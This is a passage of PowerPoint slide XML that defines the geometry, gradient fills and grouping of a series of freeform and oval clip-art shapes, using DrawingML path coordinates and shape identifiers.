                      <a:cubicBezTo>
                        <a:pt x="54" y="21"/>
                        <a:pt x="48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Freeform 1189">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5BF76B8-36B5-44A1-9347-8BCAD1E3BD9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972" y="1435"/>
                  <a:ext cx="104" cy="117"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 159 w 159"/>
                    <a:gd name="T1" fmla="*/ 6 h 180"/>
                    <a:gd name="T2" fmla="*/ 132 w 159"/>
                    <a:gd name="T3" fmla="*/ 21 h 180"/>
                    <a:gd name="T4" fmla="*/ 81 w 159"/>
                    <a:gd name="T5" fmla="*/ 11 h 180"/>
                    <a:gd name="T6" fmla="*/ 72 w 159"/>
                    <a:gd name="T7" fmla="*/ 0 h 180"/>
                    <a:gd name="T8" fmla="*/ 68 w 159"/>
                    <a:gd name="T9" fmla="*/ 19 h 180"/>
                    <a:gd name="T10" fmla="*/ 17 w 159"/>
                    <a:gd name="T11" fmla="*/ 32 h 180"/>
                    <a:gd name="T12" fmla="*/ 1 w 159"/>
                    <a:gd name="T13" fmla="*/ 55 h 180"/>
                    <a:gd name="T14" fmla="*/ 1 w 159"/>
                    <a:gd name="T15" fmla="*/ 145 h 180"/>
                    <a:gd name="T16" fmla="*/ 36 w 159"/>
                    <a:gd name="T17" fmla="*/ 156 h 180"/>
                    <a:gd name="T18" fmla="*/ 43 w 159"/>
                    <a:gd name="T19" fmla="*/ 145 h 180"/>
                    <a:gd name="T20" fmla="*/ 42 w 159"/>
                    <a:gd name="T21" fmla="*/ 73 h 180"/>
                    <a:gd name="T22" fmla="*/ 42 w 159"/>
                    <a:gd name="T23" fmla="*/ 73 h 180"/>
                    <a:gd name="T24" fmla="*/ 42 w 159"/>
                    <a:gd name="T25" fmla="*/ 72 h 180"/>
                    <a:gd name="T26" fmla="*/ 42 w 159"/>
                    <a:gd name="T27" fmla="*/ 66 h 180"/>
                    <a:gd name="T28" fmla="*/ 42 w 159"/>
                    <a:gd name="T29" fmla="*/ 64 h 180"/>
                    <a:gd name="T30" fmla="*/ 42 w 159"/>
                    <a:gd name="T31" fmla="*/ 63 h 180"/>
                    <a:gd name="T32" fmla="*/ 59 w 159"/>
                    <a:gd name="T33" fmla="*/ 41 h 180"/>
                    <a:gd name="T34" fmla="*/ 103 w 159"/>
                    <a:gd name="T35" fmla="*/ 30 h 180"/>
                    <a:gd name="T36" fmla="*/ 103 w 159"/>
                    <a:gd name="T37" fmla="*/ 30 h 180"/>
                    <a:gd name="T38" fmla="*/ 59 w 159"/>
                    <a:gd name="T39" fmla="*/ 41 h 180"/>
                    <a:gd name="T40" fmla="*/ 42 w 159"/>
                    <a:gd name="T41" fmla="*/ 63 h 180"/>
                    <a:gd name="T42" fmla="*/ 42 w 159"/>
                    <a:gd name="T43" fmla="*/ 71 h 180"/>
                    <a:gd name="T44" fmla="*/ 42 w 159"/>
                    <a:gd name="T45" fmla="*/ 72 h 180"/>
                    <a:gd name="T46" fmla="*/ 42 w 159"/>
                    <a:gd name="T47" fmla="*/ 77 h 180"/>
                    <a:gd name="T48" fmla="*/ 42 w 159"/>
                    <a:gd name="T49" fmla="*/ 77 h 180"/>
                    <a:gd name="T50" fmla="*/ 43 w 159"/>
                    <a:gd name="T51" fmla="*/ 154 h 180"/>
                    <a:gd name="T52" fmla="*/ 43 w 159"/>
                    <a:gd name="T53" fmla="*/ 154 h 180"/>
                    <a:gd name="T54" fmla="*/ 43 w 159"/>
                    <a:gd name="T55" fmla="*/ 157 h 180"/>
                    <a:gd name="T56" fmla="*/ 84 w 159"/>
                    <a:gd name="T57" fmla="*/ 157 h 180"/>
                    <a:gd name="T58" fmla="*/ 85 w 159"/>
                    <a:gd name="T59" fmla="*/ 77 h 180"/>
                    <a:gd name="T60" fmla="*/ 89 w 159"/>
                    <a:gd name="T61" fmla="*/ 69 h 180"/>
                    <a:gd name="T62" fmla="*/ 141 w 159"/>
                    <a:gd name="T63" fmla="*/ 55 h 180"/>
                    <a:gd name="T64" fmla="*/ 159 w 159"/>
                    <a:gd name="T65" fmla="*/ 25 h 180"/>
                    <a:gd name="T66" fmla="*/ 159 w 159"/>
                    <a:gd name="T67" fmla="*/ 8 h 180"/>
                    <a:gd name="T68" fmla="*/ 159 w 159"/>
                    <a:gd name="T69" fmla="*/ 6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9" h="180">
                      <a:moveTo>
                        <a:pt x="159" y="6"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="156" y="17"/>
                        <a:pt x="140" y="23"/>
                        <a:pt x="132" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="124" y="20"/>
                        <a:pt x="94" y="14"/>
                        <a:pt x="81" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="10"/>
                        <a:pt x="73" y="5"/>
                        <a:pt x="72" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="72" y="19"/>
                        <a:pt x="72" y="18"/>
                        <a:pt x="68" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="68" y="19"/>
                        <a:pt x="28" y="28"/>
                        <a:pt x="17" y="32"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="36"/>
                        <a:pt x="2" y="42"/>
                        <a:pt x="1" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="55"/>
                        <a:pt x="0" y="135"/>
                        <a:pt x="1" y="145"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="163"/>
                        <a:pt x="25" y="165"/>
                        <a:pt x="36" y="156"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="39" y="153"/>
                        <a:pt x="43" y="149"/>
                        <a:pt x="43" y="145"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="130"/>
                        <a:pt x="42" y="102"/>
                        <a:pt x="42" y="73"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="73"/>
                        <a:pt x="42" y="73"/>
                        <a:pt x="42" y="73"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="73"/>
                        <a:pt x="42" y="72"/>
                        <a:pt x="42" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="70"/>
                        <a:pt x="42" y="68"/>
                        <a:pt x="42" y="66"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="65"/>
                        <a:pt x="42" y="65"/>
                        <a:pt x="42" y="64"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="64"/>
                        <a:pt x="42" y="63"/>
                        <a:pt x="42" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="50"/>
                        <a:pt x="48" y="44"/>
                        <a:pt x="59" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="68" y="37"/>
                        <a:pt x="101" y="30"/>
                        <a:pt x="103" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="107" y="28"/>
                        <a:pt x="107" y="28"/>
                        <a:pt x="103" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="101" y="30"/>
                        <a:pt x="68" y="37"/>
                        <a:pt x="59" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="48" y="44"/>
                        <a:pt x="43" y="50"/>
                        <a:pt x="42" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="64"/>
                        <a:pt x="42" y="70"/>
                        <a:pt x="42" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="71"/>
                        <a:pt x="42" y="71"/>
                        <a:pt x="42" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="72"/>
                        <a:pt x="42" y="74"/>
                        <a:pt x="42" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="77"/>
                        <a:pt x="42" y="77"/>
                        <a:pt x="42" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="154"/>
                        <a:pt x="43" y="154"/>
                        <a:pt x="43" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="154"/>
                        <a:pt x="43" y="154"/>
                        <a:pt x="43" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="155"/>
                        <a:pt x="43" y="156"/>
                        <a:pt x="43" y="157"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="180"/>
                        <a:pt x="84" y="177"/>
                        <a:pt x="84" y="157"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="84" y="142"/>
                        <a:pt x="85" y="80"/>
                        <a:pt x="85" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="74"/>
                        <a:pt x="87" y="70"/>
                        <a:pt x="89" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="91" y="69"/>
                        <a:pt x="136" y="57"/>
                        <a:pt x="141" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="153" y="52"/>
                        <a:pt x="159" y="47"/>
                        <a:pt x="159" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="159" y="8"/>
                        <a:pt x="159" y="8"/>
                        <a:pt x="159" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="159" y="7"/>
                        <a:pt x="159" y="7"/>
                        <a:pt x="159" y="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4074"/>
                    </a:gs>
                    <a:gs pos="50000">
                      <a:srgbClr val="004074">
                        <a:gamma/>
                        <a:shade val="85882"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="004074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35" name="Oval 1190">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9948516-DDDD-47DF-B2B7-68E875C98F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flipH="1">
                  <a:off x="4020" y="1289"/>
                  <a:ext cx="52" cy="52"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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36" name="Freeform 1191">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C59CCB34-3735-4304-BC80-14521A100DD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4033" y="1355"/>
                  <a:ext cx="16" cy="76"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 55"/>
                    <a:gd name="T1" fmla="*/ 0 h 265"/>
                    <a:gd name="T2" fmla="*/ 14 w 55"/>
                    <a:gd name="T3" fmla="*/ 22 h 265"/>
                    <a:gd name="T4" fmla="*/ 5 w 55"/>
                    <a:gd name="T5" fmla="*/ 239 h 265"/>
                    <a:gd name="T6" fmla="*/ 29 w 55"/>
                    <a:gd name="T7" fmla="*/ 265 h 265"/>
                    <a:gd name="T8" fmla="*/ 52 w 55"/>
                    <a:gd name="T9" fmla="*/ 253 h 265"/>
                    <a:gd name="T10" fmla="*/ 38 w 55"/>
                    <a:gd name="T11" fmla="*/ 29 h 265"/>
                    <a:gd name="T12" fmla="*/ 55 w 55"/>
                    <a:gd name="T13" fmla="*/ 15 h 265"/>
                    <a:gd name="T14" fmla="*/ 0 w 55"/>
                    <a:gd name="T15" fmla="*/ 0 h 2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5" h="265">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="14" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="239"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="29" y="265"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="52" y="253"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="38" y="29"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5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40505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6350" cap="flat" cmpd="sng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37" name="Freeform 1192">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92037640-0921-4954-B79F-8CE48B289CF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4030" y="1412"/>
                  <a:ext cx="59" cy="35"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 75 w 91"/>
                    <a:gd name="T1" fmla="*/ 0 h 54"/>
                    <a:gd name="T2" fmla="*/ 28 w 91"/>
                    <a:gd name="T3" fmla="*/ 14 h 54"/>
                    <a:gd name="T4" fmla="*/ 40 w 91"/>
                    <a:gd name="T5" fmla="*/ 46 h 54"/>
                    <a:gd name="T6" fmla="*/ 91 w 91"/>
                    <a:gd name="T7" fmla="*/ 32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1" h="54">
                      <a:moveTo>
                        <a:pt x="75" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="61" y="4"/>
                        <a:pt x="45" y="8"/>
                        <a:pt x="28" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="22"/>
                        <a:pt x="17" y="54"/>
                        <a:pt x="40" y="46"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="44"/>
                        <a:pt x="66" y="38"/>
                        <a:pt x="91" y="32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50000">
                      <a:srgbClr val="FFFFFF">
                        <a:gamma/>
                        <a:shade val="85882"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFFFFF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10" name="Group 1193">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6CF3C17-631C-485A-A043-26272F0C235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3719" y="1389"/>
                <a:ext cx="429" cy="228"/>
                <a:chOff x="786" y="2382"/>
                <a:chExt cx="1190" cy="634"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1020" name="Freeform 1194">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1699D176-3FC4-4B14-8181-33548872962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933" y="2464"/>
                  <a:ext cx="43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1" name="Freeform 1195">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38633FD1-625F-4D97-8003-7D38D304F04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888" y="2464"/>
                  <a:ext cx="45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2" name="Freeform 1196">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38C94CF5-71CB-4CF7-B990-8C2E25679EB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038" y="2694"/>
                  <a:ext cx="46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4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3" name="Freeform 1197">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00A68CA7-19E2-42E4-A27A-2890092739A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084" y="2694"/>
                  <a:ext cx="42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Freeform 1198">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B170AF50-68C1-4ED8-B0F9-04F48B1A36B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786" y="2625"/>
                  <a:ext cx="45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Freeform 1199">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E27D4118-28E7-4856-A1F1-CE2E4622BD3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831" y="2625"/>
                  <a:ext cx="43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6" name="Freeform 1200">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03D3F22F-654B-4CDD-8A20-04FD230C2E4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33" y="2382"/>
                  <a:ext cx="42" cy="325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201">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98A097DE-D6BB-4870-BA72-04306F15ADB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33" y="2394"/>
                  <a:ext cx="42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4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8" name="Freeform 1202">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79E80B9D-F5E7-495F-B12D-2B97CA642FA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75" y="2394"/>
                  <a:ext cx="46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29" name="Freeform 1203">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6D0BC18-AF2D-4219-8F06-B1C9A8F1C99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786" y="2382"/>
                  <a:ext cx="1190" cy="325"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 321"/>
                    <a:gd name="T1" fmla="*/ 65 h 87"/>
                    <a:gd name="T2" fmla="*/ 160 w 321"/>
                    <a:gd name="T3" fmla="*/ 22 h 87"/>
                    <a:gd name="T4" fmla="*/ 160 w 321"/>
                    <a:gd name="T5" fmla="*/ 22 h 87"/>
                    <a:gd name="T6" fmla="*/ 240 w 321"/>
                    <a:gd name="T7" fmla="*/ 0 h 87"/>
                    <a:gd name="T8" fmla="*/ 321 w 321"/>
                    <a:gd name="T9" fmla="*/ 22 h 87"/>
                    <a:gd name="T10" fmla="*/ 240 w 321"/>
                    <a:gd name="T11" fmla="*/ 44 h 87"/>
                    <a:gd name="T12" fmla="*/ 240 w 321"/>
                    <a:gd name="T13" fmla="*/ 44 h 87"/>
                    <a:gd name="T14" fmla="*/ 81 w 321"/>
                    <a:gd name="T15" fmla="*/ 87 h 87"/>
                    <a:gd name="T16" fmla="*/ 0 w 321"/>
                    <a:gd name="T17" fmla="*/ 6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21" h="87">
                      <a:moveTo>
                        <a:pt x="0" y="65"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="160" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="160" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="240" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="321" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="240" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="240" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="81" y="87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8E47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30" name="Freeform 1204">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B0B6291-554F-4597-AC27-298559A76F0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084" y="2464"/>
                  <a:ext cx="892" cy="285"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 241"/>
                    <a:gd name="T1" fmla="*/ 65 h 77"/>
                    <a:gd name="T2" fmla="*/ 0 w 241"/>
                    <a:gd name="T3" fmla="*/ 77 h 77"/>
                    <a:gd name="T4" fmla="*/ 241 w 241"/>
                    <a:gd name="T5" fmla="*/ 12 h 77"/>
                    <a:gd name="T6" fmla="*/ 241 w 241"/>
                    <a:gd name="T7" fmla="*/ 0 h 77"/>
                    <a:gd name="T8" fmla="*/ 0 w 241"/>
                    <a:gd name="T9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1" h="77">
                      <a:moveTo>
                        <a:pt x="0" y="65"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241" y="12"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241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31" name="Freeform 1205">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{296272B4-3B8E-4BFE-91C0-A8E5F97F27C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786" y="2625"/>
                  <a:ext cx="298" cy="124"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 80"/>
                    <a:gd name="T1" fmla="*/ 0 h 34"/>
                    <a:gd name="T2" fmla="*/ 0 w 80"/>
                    <a:gd name="T3" fmla="*/ 13 h 34"/>
                    <a:gd name="T4" fmla="*/ 80 w 80"/>
                    <a:gd name="T5" fmla="*/ 34 h 34"/>
                    <a:gd name="T6" fmla="*/ 80 w 80"/>
                    <a:gd name="T7" fmla="*/ 22 h 34"/>
                    <a:gd name="T8" fmla="*/ 0 w 80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0" h="34">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="13"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="80" y="34"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="80" y="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11" name="Freeform 1206">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83A28F58-808A-4C35-B3B4-88BD71444A0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27" y="1446"/>
                <a:ext cx="158" cy="42"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 668 w 668"/>
                  <a:gd name="T1" fmla="*/ 76 h 177"/>
                  <a:gd name="T2" fmla="*/ 377 w 668"/>
                  <a:gd name="T3" fmla="*/ 0 h 177"/>
                  <a:gd name="T4" fmla="*/ 0 w 668"/>
                  <a:gd name="T5" fmla="*/ 102 h 177"/>
                  <a:gd name="T6" fmla="*/ 288 w 668"/>
                  <a:gd name="T7" fmla="*/ 177 h 177"/>
                  <a:gd name="T8" fmla="*/ 668 w 668"/>
                  <a:gd name="T9" fmla="*/ 76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8" h="177">
                    <a:moveTo>
                      <a:pt x="668" y="76"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="377" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="668" y="7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012" name="Group 1207">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A5F566C-AB72-4337-8CA8-161813D0C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39" y="1365"/>
                <a:ext cx="134" cy="89"/>
                <a:chOff x="1859" y="2279"/>
                <a:chExt cx="372" cy="247"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1013" name="Freeform 1208">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94058EA6-4612-416A-93FB-42B2889C8BF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859" y="2412"/>
                  <a:ext cx="372" cy="100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 25173"/>
                    <a:gd name="T1" fmla="*/ 3378 h 6756"/>
                    <a:gd name="T2" fmla="*/ 12585 w 25173"/>
                    <a:gd name="T3" fmla="*/ 0 h 6756"/>
                    <a:gd name="T4" fmla="*/ 25173 w 25173"/>
                    <a:gd name="T5" fmla="*/ 3378 h 6756"/>
                    <a:gd name="T6" fmla="*/ 12585 w 25173"/>
                    <a:gd name="T7" fmla="*/ 6756 h 6756"/>
                    <a:gd name="T8" fmla="*/ 0 w 25173"/>
                    <a:gd name="T9" fmla="*/ 3378 h 67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173" h="6756">
                      <a:moveTo>
                        <a:pt x="0" y="3378"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="12585" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="25173" y="3378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="6756"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="3378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Freeform 1209">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7647C7C5-4ADA-4141-AB8E-AC7CB295C0A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045" y="2462"/>
                  <a:ext cx="186" cy="64"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 12588"/>
                    <a:gd name="T1" fmla="*/ 3378 h 4342"/>
                    <a:gd name="T2" fmla="*/ 0 w 12588"/>
                    <a:gd name="T3" fmla="*/ 4342 h 4342"/>
                    <a:gd name="T4" fmla="*/ 12588 w 12588"/>
                    <a:gd name="T5" fmla="*/ 964 h 4342"/>
                    <a:gd name="T6" fmla="*/ 12588 w 12588"/>
                    <a:gd name="T7" fmla="*/ 0 h 4342"/>
                    <a:gd name="T8" fmla="*/ 0 w 12588"/>
                    <a:gd name="T9" fmla="*/ 3378 h 43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588" h="4342">
                      <a:moveTo>
                        <a:pt x="0" y="3378"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="4342"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12588" y="964"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12588" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="3378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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="80808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5" name="Freeform 1210">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F1A469F-86E2-43FB-A0BA-13CC12BA0B0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859" y="2462"/>
                  <a:ext cx="186" cy="64"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T1" fmla="*/ 4342 h 4342"/>
                    <a:gd name="T2" fmla="*/ 0 w 12585"/>
                    <a:gd name="T3" fmla="*/ 964 h 4342"/>
                    <a:gd name="T4" fmla="*/ 0 w 12585"/>
                    <a:gd name="T5" fmla="*/ 0 h 4342"/>
                    <a:gd name="T6" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T7" fmla="*/ 3378 h 4342"/>
                    <a:gd name="T8" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T9" fmla="*/ 4342 h 43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585" h="4342">
                      <a:moveTo>
                        <a:pt x="12585" y="4342"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="964"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="3378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="43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6" name="Freeform 1211">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD1D90AB-7ED1-4DF0-9BD4-C9E13DC84B1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912" y="2428"/>
                  <a:ext cx="252" cy="68"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 17020"/>
                    <a:gd name="T1" fmla="*/ 1711 h 4567"/>
                    <a:gd name="T2" fmla="*/ 10647 w 17020"/>
                    <a:gd name="T3" fmla="*/ 4567 h 4567"/>
                    <a:gd name="T4" fmla="*/ 17020 w 17020"/>
                    <a:gd name="T5" fmla="*/ 2859 h 4567"/>
                    <a:gd name="T6" fmla="*/ 6371 w 17020"/>
                    <a:gd name="T7" fmla="*/ 0 h 4567"/>
                    <a:gd name="T8" fmla="*/ 0 w 17020"/>
                    <a:gd name="T9" fmla="*/ 1711 h 45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020" h="4567">
                      <a:moveTo>
                        <a:pt x="0" y="1711"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="10647" y="4567"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17020" y="2859"/>
                      </a:lnTo>
